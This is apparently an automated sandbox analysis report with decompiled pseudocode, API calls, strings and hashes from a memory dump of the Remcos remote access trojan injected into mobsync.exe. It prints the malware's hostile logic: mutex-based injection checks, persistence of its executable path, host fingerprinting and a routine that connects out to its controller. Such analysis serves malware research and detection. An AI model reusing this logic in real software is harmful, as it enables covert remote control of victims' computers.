						__eflags = _t92 - 0xb7;
						if(_t92 == 0xb7) {
							L45:
							L00401FA7();
							_t94 = _t269;
							goto L5;
						} else {
							E0040D072();
							GetModuleFileNameW(0, "C:\Windows\SysWOW64\mobsync.exe", 0x104);
							_t97 = L00416F6C(0x46c548);
							_push(0x46c548);
							_t444 = 0x80000002;
							 *0x46beb4 = _t97;
							_t98 = E004102D2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
							_t495 = _t493 + 0xc;
							L00401FB1(0x46c5b4, 0x80000002, 0x46c5b4, _t98);
							L00401FA7();
							__eflags =  *0x46beb4;
							if( *0x46beb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							E004059B5(_t269, 0x46c5b4, _t458);
							_t102 =  *0x46bd24;
							__eflags = _t102;
							if(_t102 != 0) {
								 *0x46a9d0 =  *_t102();
							}
							_t473 = 0x46c578;
							__eflags = _v776 - _t458;
							if(__eflags == 0) {
								_t429 = L00401E29(0x46c578, _t444, __eflags, 0x2e);
								__eflags =  *((char*)(L00401F75(_t429)));
								if(__eflags != 0) {
									__eflags =  *0x46bd24 - _t458; // 0x7614e630
									if(__eflags != 0) {
										__eflags =  *0x46a9d0 - _t458; // 0x1
										if(__eflags == 0) {
											_t444 = L00401F75(0x46c518);
											_t251 = E0041022B(0x46c518, _t250, "origmsc");
											_pop(_t431);
											__eflags = _t251;
											if(__eflags == 0) {
												L00405F2A(_t269, _t431, _t444);
											}
										} else {
											_push(_t429);
											_push(_t429);
											__eflags = E0040AAB0() - 0xffffffff;
											if(__eflags == 0) {
												E00406024(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D797();
							}
							L00409DCB(_t269, 0x46c4e8, L00401F75(L00401E29(_t473, _t444, __eflags, 0xb)));
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 4))));
							 *0x46bb06 = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 5))));
							 *0x46baff = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 8))));
							 *0x46bb04 = __eflags != 0;
							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 3))));
							if(__eflags != 0) {
								_t237 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x30));
								_t24 = _t237 + 2; // 0x2
								_t444 = _t24;
								do {
									_t419 =  *_t237;
									_t237 = _t237 + 2;
									__eflags = _t419 - _t458;
								} while (_t419 != _t458);
								__eflags = _t237 - _t444;
								if(__eflags != 0) {
									_t241 = L00401F75(L00401E29(_t473, _t444, __eflags, 9));
									_t243 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30));
									_t444 =  *_t241;
									L00401EDA(0x46c530,  *_t241, _t241, E004179B3( &_v780,  *_t241, _t243));
									L00401ED0();
									_t473 = 0x46c578;
								}
							}
							__eflags = _v776 - _t458;
							if(_v776 != _t458) {
								E00431810(_t458,  &_v524, _t458, 0x208);
								_t118 = E00402469();
								_t119 = L00401F75(0x46c560);
								_t445 = L00401F75(0x46c518);
								E00410420(_t121, "exepath",  &_v524, 0x208, _t119, _t118);
								_t493 = _t495 + 0x20;
								L00409DCB(_t269, 0x46c500,  &_v524);
								_t461 = 0x46c578;
								goto L47;
							} else {
								__eflags =  *0x46bb05;
								if(__eflags == 0) {
									L00409DCB(_t269, 0x46c500, "C:\Windows\SysWOW64\mobsync.exe");
								} else {
									_t226 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x1e));
									_t228 = L00401F75(L00401E29(_t473, _t444, __eflags, 0xc));
									_t230 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 9));
									__eflags =  *_t226;
									__eflags =  *_t228;
									_t473 = 0x46c578;
									_t232 = L00401F75(L00401E29(0x46c578, _t444,  *_t228, 0xa));
									L0040AD0A( *_t230, L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30)), _t232, ((_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0x000000ff);
									_t495 = _t495 + 0xc;
									_t269 = 1;
									_t458 = 0;
								}
								_t202 = E00402469();
								_t447 = 2;
								_t386 =  ~(0 | __eflags > 0x00000000) | (_t202 + 0x00000001) * _t447;
								_push(_t386);
								_v780 = _t386;
								_t482 = L0042EE1E(_t386, (_t202 + 1) * _t447 >> 0x20, _t473, __eflags);
								__eflags = _t482;
								if(_t482 == 0) {
									_t482 = _t458;
								} else {
									E00431810(_t458, _t482, _t458, _v780);
									_t495 = _t495 + 0xc;
								}
								_t206 = L00401ECB(0x46c500);
								_t450 = _t482 - _t206;
								__eflags = _t450;
								_t463 = 2;
								do {
									_t389 =  *_t206 & 0x0000ffff;
									 *(_t206 + _t450) = _t389;
									_t206 = _t206 + _t463;
									__eflags = _t389;
								} while (_t389 != 0);
								_push(_t389);
								_t207 = E00402469();
								_t208 = L00401F75(0x46c560);
								_t209 = E00402469();
								E00410670(L00401F75(0x46c518), __eflags, "exepath", _t482, 2 + _t209 * 2, _t208, _t207); // executed
								L0042EE27(_t482);
								_t461 = 0x46c578;
								_push(_t269);
								_t215 = L00401F75(L00401E29(0x46c578, _t211, __eflags, 0x34));
								_t501 = _t495 + 0x1c - 0x18;
								E00402064(_t269, _t501, _t215);
								_push("licence");
								E00410497(0x46c518, L00401F75(0x46c518)); // executed
								_t493 = _t501 + 0x20;
								L00401E29(0x46c578, _t217, __eflags, 0xd);
								_t445 = "0";
								__eflags = L0040EE79(__eflags);
								if(__eflags == 0) {
									L47:
									_t127 = E00436079(_t125, L00401F75(L00401E29(_t461, _t445, __eflags, 0x28)));
									 *0x46bb07 = _t127;
									__eflags = _t127 - 2;
									if(_t127 != 2) {
										__eflags = _t127 - _t269;
										if(__eflags == 0) {
											_t380 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t380 = _t269;
										L51:
										E004188B1(_t269, _t380, _t445);
										__eflags = 0;
										CreateThread(0, 0, E00418680, 0, 0, 0);
									}
									_t129 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x37));
									_t131 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x10));
									_t133 = L00401F75(L00401E29(_t461, _t445, __eflags, 0xf));
									__eflags =  *_t129;
									_t467 = 0x46c578;
									_t136 = E00436079(_t134, L00401F75(L00401E29(0x46c578, _t445,  *_t129, 0x36)));
									_t138 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x11));
									E0040846F(_t131,  *_t133 & 0x000000ff,  *_t131 & 0x000000ff, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x31)), _t138, _t136, (_t132 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t457 = CreateThread;
									} else {
										_t191 = 2;
										_t481 = L0042EB70(_t445, 0x46c578, __eflags, _t191);
										 *_t481 = 0;
										_t378 = L00401E29(0x46c578, _t445, __eflags, 0x35);
										_t195 = L00401F75(_t378);
										_t457 = CreateThread;
										__eflags =  *_t195;
										 *((char*)(_t481 + 1)) = _t378 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E004152D7, _t481, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t185 = 2;
										_t480 = L0042EB70(_t445, _t467, __eflags, _t185);
										 *_t480 = 1;
										_t374 = L00401E29(0x46c578, _t445, __eflags, 0x35);
										_t188 = L00401F75(_t374);
										__eflags =  *_t188;
										__eflags = 0;
										 *((char*)(_t480 + 1)) = _t374 & 0xffffff00 |  *_t188 != 0x00000000;
										CreateThread(0, 0, E004152D7, _t480, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46ba75 = 1;
										_t177 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x25));
										_t179 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x26));
										_t445 =  *_t177;
										L00401EDA(0x46c0e0,  *_t177, _t177, E00417967( &_v780,  *_t177, _t179));
										L00401ED0();
										__eflags = 0;
										CreateThread(0, 0, 0x401bad, 0, 0, 0);
										_t467 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t467 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x2c));
										_t174 = E00436079(_t172, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x2d)));
										__eflags =  *_t467;
										_t445 = _t174;
										__eflags =  *_t467 != 0;
										E0040AA16(_t174);
									}
									_t152 = E004166F6( &_v772, _t457, __eflags); // executed
									L00401EDA(0x46c584, _t445, _t467, _t152);
									_t352 =  &_v776;
									L00401ED0();
									_t155 =  *0x46bd18;
									_t266 = 0;
									__eflags = _t155;
									if(_t155 != 0) {
										 *_t155(0); // executed
									}
									CreateThread(_t266, _t266, E0040D455, _t266, _t266, _t266); // executed
									__eflags =  *0x46bd4e;
									if( *0x46bd4e != 0) {
										CreateThread(_t266, _t266, E0040F4B7, _t266, _t266, _t266);
									}
									__eflags =  *0x46bd4f;
									if( *0x46bd4f != 0) {
										CreateThread(_t266, _t266, E0040F9D5, _t266, _t266, _t266);
									}
									_t157 =  *0x46a9d0; // 0x1
									_t158 = _t157 - _t266;
									__eflags = _t158;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t158 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t221 = L00401E29(0x46c578, "0", __eflags, 0xd);
									_t502 = _t493 - 0x18;
									_t445 = _t221;
									L00416C32(_t502, _t221);
									_t223 = E0040D1AD(__eflags);
									_t493 = _t502 + 0x18;
									__eflags = _t223 - _t269;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t269 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t262 = E00410275(L00401F75(0x46c518), "WD",  &_v780);
						__eflags = _t262;
						if(_t262 != 0) {
							E004106D2(L00401F75(0x46c518), __eflags, "WD");
							E0040F785();
							L71:
							_push("User");
							L72:
							E004075C4(_t266, _t493 - 0x18, "Access level: ", _t457, __eflags, E00402064(_t266,  &_v776));
							E00402064(_t266, _t493 - 4, "[Info]");
							E004165D8(_t266, _t457);
							_t352 =  &_v784;
							L00401FA7(); // executed
							L73:
							E00411319(); // executed
							asm("int3");
							_push(_t467);
							_t477 = _t352 + 0x68;
							E0040D8B5(_t266, _t477, _t477);
							_t281 = _t477;
							 *_t281 = 0x4607a0;
							 *_t281 = 0x46075c;
							return L0042FE13(_t281);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0040D8E4( &_v700, __edx, __eflags, "licence_code.txt", 2);
							__ecx = 0x46c578;
							__ecx = L00401E29(0x46c578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = L0040EC5B( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0040D895( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							L00401FA7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t94;
						}
					}
				}
			}

0x0040c641
0x0040c651
0x0040c654
0x0040c659
0x0040c663
0x0040c668
0x0040c672
0x0040c67b
0x0040c680
0x0040c684
0x0040c68d
0x0040c692
0x0040c698
0x0040c6ff
0x0040c6ff
0x0040c71d
0x0040c720
0x0040c742
0x0040c748
0x0040c750
0x0040c759
0x0040c762
0x0040c767
0x0040c76e
0x0040c77f
0x0040c781
0x0040c788
0x0040c78f
0x0040c794
0x0040c796
0x0040c79d
0x0040c7a3
0x0040c7cb
0x0040c7d6
0x0040c7e0
0x0040c7e2
0x0040c7e4
0x0040c7ec
0x0040c7f3
0x0040c7f3
0x0040c810
0x0040c812
0x0040c819
0x0040c81b
0x0040c825
0x0040c827
0x0040c82c
0x0040c83e
0x0040c845
0x0040c84d
0x0040c84f
0x0040c852
0x0040c858
0x0040c85e
0x0040c863
0x0040cc1b
0x0040cc1f
0x0040cc24
0x00000000
0x0040c869
0x0040c869
0x0040c879
0x0040c87f
0x0040c884
0x0040c88f
0x0040c894
0x0040c89d
0x0040c8a2
0x0040c8ad
0x0040c8b6
0x0040c8bb
0x0040c8c4
0x0040c8cd
0x0040c8c6
0x0040c8c6
0x0040c8c6
0x0040c8d2
0x0040c8d7
0x0040c8dc
0x0040c8de
0x0040c8e2
0x0040c8e2
0x0040c8e7
0x0040c8ec
0x0040c8f0
0x0040c8fb
0x0040c902
0x0040c905
0x0040c907
0x0040c90d
0x0040c90f
0x0040c915
0x0040c939
0x0040c93b
0x0040c940
0x0040c941
0x0040c943
0x0040c945
0x0040c945
0x0040c917
0x0040c917
0x0040c918
0x0040c91e
0x0040c921
0x0040c923
0x0040c923
0x0040c921
0x0040c915
0x0040c90d
0x0040c905
0x0040c95a
0x0040c95d
0x0040c95f
0x0040c95f
0x0040c97a
0x0040c993
0x0040c996
0x0040c9ad
0x0040c9b0
0x0040c9c7
0x0040c9ca
0x0040c9dd
0x0040c9e0
0x0040c9ed
0x0040c9f2
0x0040c9f2
0x0040c9f5
0x0040c9f5
0x0040c9f8
0x0040c9fb
0x0040c9fb
0x0040ca00
0x0040ca04
0x0040ca11
0x0040ca26
0x0040ca2b
0x0040ca3e
0x0040ca47
0x0040ca4c
0x0040ca4c
0x0040ca04
0x0040ca51
0x0040ca55
0x0040cc3a
0x0040cc49
0x0040cc51
0x0040cc6f
0x0040cc71
0x0040cc76
0x0040cc86
0x0040cc8b
0x00000000
0x0040ca5b
0x0040ca5b
0x0040ca62
0x0040caf8
0x0040ca68
0x0040ca73
0x0040ca85
0x0040ca9a
0x0040ca9f
0x0040caa7
0x0040caad
0x0040cac5
0x0040cadf
0x0040cae6
0x0040cae9
0x0040caea
0x0040caea
0x0040cb02
0x0040cb0c
0x0040cb14
0x0040cb16
0x0040cb17
0x0040cb20
0x0040cb23
0x0040cb25
0x0040cb37
0x0040cb27
0x0040cb2d
0x0040cb32
0x0040cb32
0x0040cb3e
0x0040cb47
0x0040cb47
0x0040cb49
0x0040cb4a
0x0040cb4a
0x0040cb4d
0x0040cb51
0x0040cb53
0x0040cb53
0x0040cb58
0x0040cb60
0x0040cb68
0x0040cb73
0x0040cb92
0x0040cb98
0x0040cba0
0x0040cba7
0x0040cbb1
0x0040cbb6
0x0040cbbc
0x0040cbc1
0x0040cbd2
0x0040cbd7
0x0040cbde
0x0040cbe3
0x0040cbef
0x0040cbf1
0x0040cc90
0x0040cca1
0x0040ccac
0x0040ccb2
0x0040ccb4
0x0040ccba
0x0040ccbc
0x0040ccbe
0x0040ccbe
0x00000000
0x0040ccbe
0x0040ccb6
0x0040ccb6
0x0040ccc0
0x0040ccc0
0x0040ccc5
0x0040ccd1
0x0040ccd1
0x0040ccde
0x0040ccf0
0x0040cd02
0x0040cd07
0x0040cd0c
0x0040cd29
0x0040cd3b
0x0040cd5a
0x0040cd72
0x0040cd74
0x0040cdbd
0x0040cd76
0x0040cd78
0x0040cd7f
0x0040cd8b
0x0040cd92
0x0040cd94
0x0040cd99
0x0040cd9f
0x0040cdb1
0x0040cdb4
0x0040cdb6
0x0040cdb6
0x0040cdd3
0x0040cdd5
0x0040cdd9
0x0040cde0
0x0040cdea
0x0040cdf1
0x0040cdf3
0x0040cdf8
0x0040cdfe
0x0040ce0a
0x0040ce0d
0x0040ce0f
0x0040ce0f
0x0040ce24
0x0040ce26
0x0040ce2c
0x0040ce39
0x0040ce4e
0x0040ce53
0x0040ce66
0x0040ce6f
0x0040ce74
0x0040ce80
0x0040ce82
0x0040ce82
0x0040ce97
0x0040ce99
0x0040ceb2
0x0040cec1
0x0040cec6
0x0040cec9
0x0040cecc
0x0040cecf
0x0040cecf
0x0040ced8
0x0040cee3
0x0040cee8
0x0040ceec
0x0040cef1
0x0040cef6
0x0040cef8
0x0040cefa
0x0040cefd
0x0040cefd
0x0040cf09
0x0040cf0b
0x0040cf12
0x0040cf1e
0x0040cf1e
0x0040cf20
0x0040cf27
0x0040cf33
0x0040cf33
0x0040cf35
0x0040cf3a
0x0040cf3a
0x0040cf3c
0x00000000
0x0040cf3e
0x0040cf3e
0x0040cf41
0x0040cf43
0x00000000
0x0040cf43
0x0040cf41
0x00000000
0x0040cbf7
0x0040cbfb
0x0040cc00
0x0040cc03
0x0040cc07
0x0040cc0c
0x0040cc11
0x0040cc14
0x0040cc16
0x00000000
0x0040cc18
0x0040cc1a
0x00000000
0x0040cc1a
0x0040cc16
0x0040cbf1
0x0040ca55
0x0040c7a5
0x0040c7a9
0x0040c7bc
0x0040c7c3
0x0040c7c5
0x0040cf58
0x0040cf62
0x0040cf67
0x0040cf67
0x0040cf6c
0x0040cf80
0x0040cf8f
0x0040cf94
0x0040cf9c
0x0040cfa0
0x0040cfa5
0x0040cfa5
0x0040cfaa
0x0040cfab
0x0040cfac
0x0040cfb1
0x0040cfb6
0x0040e3d2
0x0040c4fa
0x0040c506
0x00000000
0x00000000
0x00000000
0x0040c7c5
0x0040c69a
0x0040c69a
0x0040c69e
0x00000000
0x0040c6a0
0x0040c6a0
0x0040c6a4
0x0040c6a6
0x00000000
0x0040c6a8
0x0040c6a8
0x0040c6a9
0x0040c6b1
0x0040c6b5
0x0040c6bc
0x0040c6c6
0x0040c6cd
0x0040c6cf
0x0040c6d3
0x0040c6d8
0x0040c6dc
0x0040c6e1
0x0040c6e5
0x0040c6ea
0x0040c6f3
0x0040c6f5
0x0040c6f5
0x0040c6f6
0x0040c6fc
0x0040c6fc
0x0040c6a6
0x0040c69e

APIs

OpenMutexA.KERNEL32 ref: 0040C7DA
WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C7EC
CloseHandle.KERNEL32(00000000), ref: 0040C7F3
CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,0000000E), ref: 0040C852
GetLastError.KERNEL32 ref: 0040C858
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\mobsync.exe,00000104), ref: 0040C879

Part of subcall function 0040EC5B: __EH_prolog.LIBCMT ref: 0040EC60

Strings

User, xrefs: 0040CF67
Access level: , xrefs: 0040CF78
ProductName, xrefs: 0040C885
Administrator, xrefs: 0040CF43
origmsc, xrefs: 0040C92A
licence, xrefs: 0040CBC1
Inj, xrefs: 0040C7FD, 0040C808, 0040C81D
C:\Windows\SysWOW64\mobsync.exe, xrefs: 0040C873, 0040CAEE
Remcos, xrefs: 0040C975
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040C88A
(64 bit), xrefs: 0040C8C6
exepath, xrefs: 0040CB86, 0040CC65
Remcos-ZXIQGD, xrefs: 0040C836
[Info], xrefs: 0040CF8A
licence_code.txt, xrefs: 0040C6AC
(32 bit), xrefs: 0040C8CD
Software\, xrefs: 0040C72D
Remcos_Mutex_Inj, xrefs: 0040C7CB

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\mobsync.exe$Inj$ProductName$Remcos$Remcos-ZXIQGD$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$licence_code.txt$origmsc
API String ID: 1247502528-2564177597
Opcode ID: cde10c999e05f79495a73f00b94e95dfb37e09f43989abf7880a9b0b2af0e3e7
Instruction ID: 42bfda91432e7fc4dea79f371f9b9f268822a4ed28c20108b284d7b9b352ec02
Opcode Fuzzy Hash: cde10c999e05f79495a73f00b94e95dfb37e09f43989abf7880a9b0b2af0e3e7
Instruction Fuzzy Hash: 6132F460B443516BDA15B7729CA7B3E25898B81748F04053FF542BB2E3EEBC9D41839E

Uniqueness

Uniqueness Score: -1.00%

Function 00411319, Relevance: 28.7, APIs: 6, Strings: 10, Instructions: 728
sleepnetworkthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00411319() {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v20;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v140;
				void* _v163;
				char _v164;
				char _v188;
				char _v212;
				char _v236;
				char _v260;
				char _v284;
				char _v308;
				char _v332;
				char _v356;
				char _v380;
				char _v404;
				char _v428;
				char _v452;
				char _v476;
				char _v500;
				char _v524;
				char _v548;
				char _v572;
				char _v596;
				char _v620;
				char _v644;
				char _v668;
				char _v692;
				char _v716;
				char _v740;
				char _v764;
				char _v788;
				char _v812;
				char _v836;
				char _v860;
				char _v884;
				char _v908;
				char _v932;
				char _v956;
				char _v980;
				char _v1004;
				char _v1028;
				char _v1052;
				char _v1076;
				char _v1100;
				char _v1124;
				char _v1148;
				char _v1172;
				char _v1196;
				char _v1220;
				char _v1244;
				char _v1268;
				char _v1292;
				char _v1316;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v2388;
				signed int _t162;
				void* _t164;
				long _t168;
				void* _t170;
				signed char _t174;
				void* _t180;
				short _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				long _t200;
				short _t205;
				void* _t206;
				void* _t208;
				void* _t221;
				void* _t229;
				void* _t230;
				void* _t233;
				intOrPtr* _t234;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;
				void* _t244;
				void* _t246;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t250;
				void* _t252;
				void* _t253;
				void* _t254;
				intOrPtr* _t345;
				void* _t359;
				void* _t361;
				void* _t363;
				void* _t365;
				void* _t367;
				long _t371;
				void* _t372;
				void* _t373;
				char* _t393;
				void* _t601;
				void* _t610;
				void* _t660;
				signed short _t664;
				struct _SECURITY_ATTRIBUTES* _t667;
				void* _t677;
				void* _t678;
				void* _t679;
				void* _t680;
				void* _t681;
				void* _t682;
				void* _t683;
				void* _t684;
				void* _t686;
				void* _t687;
				void* _t691;
				void* _t692;
				void* _t693;
				void* _t694;
				void* _t695;
				long _t697;

				_push(_t372);
				E004020B5(_t372,  &_v104);
				E00416934( &_v236, _t601);
				E004020B5(_t372,  &_v1388);
				_t660 = 0x46c578;
				_t162 = E00436079(_t160, L00401F75(L00401E29(0x46c578, _t601, _t695, 0x29)));
				if(_t162 != 0) {
					_t371 = _t162 * 0x3e8;
					_t697 = _t371;
					Sleep(_t371);
				}
				_t678 = _t677 - 0x18;
				E00402064(_t372, _t678, 0x4657dc);
				_t164 = L00401E29(_t660, _t601, _t697, 0);
				_t679 = _t678 - 0x18;
				E004020CC(_t372, _t679, _t601, _t697, _t164);
				L00416DD0( &_v32, _t601);
				_t680 = _t679 + 0x30;
				_t667 = 0;
				_v8 = 0;
				_t373 = 0;
				L00401E29(_t660, _t601, _t697, 0x3a);
				_t602 = 0x45f6ac;
				_t168 = L0040EE79(_t697);
				_t698 = _t168;
				if(_t168 != 0) {
					L00401E29(_t660, 0x45f6ac, _t698, 0x3a);
					_t359 = E00402469();
					_t361 = L00401F75(L00401E29(_t660, 0x45f6ac, _t698, 0x3a));
					L00401E29(_t660, 0x45f6ac, _t698, 0x39);
					_t363 = E00402469();
					_t365 = L00401F75(L00401E29(_t660, _t602, _t698, 0x39));
					L00401E29(_t660, _t602, _t698, 0x38);
					_t367 = E00402469();
					L00401F75(L00401E29(_t660, _t602, _t698, 0x38));
					_t602 = _t367;
					E0040484C(_t367, _t365, _t363, _t361, _t359);
					_t680 = _t680 + 0x10;
					_t667 = 0;
				}
				L4:
				_t681 = _t680 - 0x18;
				E00402064(_t373, _t681, 0x4657e0);
				_t170 = L00401E29( &_v32, _t602, _t698, _t373);
				_t682 = _t681 - 0x18;
				E004020CC(_t373, _t682, _t602, _t698, _t170);
				L00416DD0( &_v20, _t602);
				_t680 = _t682 + 0x30;
				L00401E29( &_v20, _t602, _t698, 2);
				_t603 = "0";
				_t174 = E00405A22("0");
				asm("sbb al, al");
				 *0x46bae0 =  ~_t174 + 1;
				E00404955(0x46c768);
				if(_t667 >= 0 || E004021D5( &_v32) > 1) {
					_t701 =  *0x46c769 - 1;
					_t393 =  &_v104;
					if( *0x46c769 != 1) {
						_push(0x45f6ac);
					} else {
						_push(" (TLS)");
					}
					E004059BE(_t373, _t393);
					_t683 = _t680 - 0x18;
					_t180 = L00401E29( &_v20, _t603, _t701, 1);
					_t602 = L00402F73(_t373,  &_v128, E0040530D(_t373,  &_v56, E004075E8( &_v80, "Connecting to ", _t701, L00401E29( &_v20, _t603, _t701, 0)), _t660, _t701, 0x4657e0), _t701, _t180);
					L00402F73(_t373, _t683, _t184, _t701,  &_v104);
					_t684 = _t683 - 0x14;
					E00402064(_t373, _t684, "[Info]");
					E004165D8(_t373, _t660);
					_t680 = _t684 + 0x30;
					L00401FA7();
					L00401FA7();
					L00401FA7();
					_t667 = _v8;
				}
				_t191 = 2;
				 *0x46bacc = _t191;
				_t193 = L00401F75(L00401E29( &_v20, _t602, _t701, 0));
				__imp__#52(_t193); // executed
				_t702 = _t193;
				if(_t193 != 0) {
					L00431DF0(0x46bad0,  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0xc)))),  *((short*)(_t193 + 0xa)));
					_t205 = E00436079(_t203, L00401F75(L00401E29( &_v20, _t602, _t702, 1)));
					__imp__#9();
					_t680 = _t680 + 0xc - 0x10;
					 *0x46bace = _t205;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t206 = E004049D2(_t602, _t205);
					_t703 = _t206;
					if(_t206 != 0) {
						_t686 = _t680 - 0x18;
						_t208 = L00401E29( &_v20, _t602, _t703, 1);
						_t610 = L00402F73(_t373,  &_v56, E0040530D(_t373,  &_v188, E004075E8( &_v212, "Connected to  ", _t703, L00401E29( &_v20, _t602, _t703, 0)), 0x46c768, _t703, 0x4657e0), _t703, _t208);
						L00402F73(_t373, _t686, _t610, _t703,  &_v104);
						_t687 = _t686 - 0x14;
						E00402064(_t373, _t687, "[Info]");
						E004165D8(_t373, 0x46c768);
						L00401FA7();
						L00401FA7();
						L00401FA7();
						E00404E64(0x46c768, 0xa, 0); // executed
						_v164 = 0;
						asm("stosd");
						_v8 = 1;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd"); // executed
						_t221 = E00416852(0x46c768); // executed
						_push(_t610);
						E00411302( &_v164, "%I64u", _t221);
						E00407352(_t373,  &_v128, _t610, _t703, 0x46c3b0);
						E0043A6FF( &_v128,  *0x46a9d0,  &_v140, 0xa);
						E004020CC(_t373,  &_v80, _t610, _t703, L00401E29(0x46c578, _t610, _t703, 1));
						_t229 = E00402469();
						_t230 = L00401F75(0x46c560);
						_t233 = E00410420(L00401F75(0x46c518), "name",  &_v2388, 0x104, _t230, _t229); // executed
						_t691 = _t687 + 0x60;
						if(_t233 != 0) {
							E004059BE(_t373,  &_v80,  &_v2388);
						}
						_t234 =  *0x46bd44; // 0x0
						_t664 = 0;
						_t705 = _t234;
						if(_t234 != 0) {
							_t664 =  *_t234() & 0x0000ffff;
						}
						E0040425F(_t373,  &_v56, "C:\Windows\SysWOW64\mobsync.exe");
						_t692 = _t691 - 0x18;
						_t237 = L00416CF4(_t373,  &_v1364, 0x46c500);
						_t238 = L00416B7E(_t373,  &_v1340, _t664 & 0x0000ffff);
						_t239 = L00401E29( &_v20, _t664 & 0x0000ffff, _t705, 0);
						_t242 = L00416B7E(_t373,  &_v1316, GetTickCount());
						_t244 = L00416B7E(_t373,  &_v1292, L00416B2E( &_v1316));
						_t246 = E00416AF4( &_v1268); // executed
						_t247 = L00416CF4(_t373,  &_v1244, _t246);
						_t248 = L00416CF4(_t373,  &_v1220, 0x46c0e0);
						_t249 = L00416CF4(_t373,  &_v1196,  &_v56);
						_t250 = L00416CF4(_t373,  &_v1172,  &_v128);
						_t252 = L00416CF4(_t373,  &_v1148, 0x46c868);
						_t253 = E0040D585( &_v1124); // executed
						_t254 = L00416CF4(_t373,  &_v1100, 0x46c584);
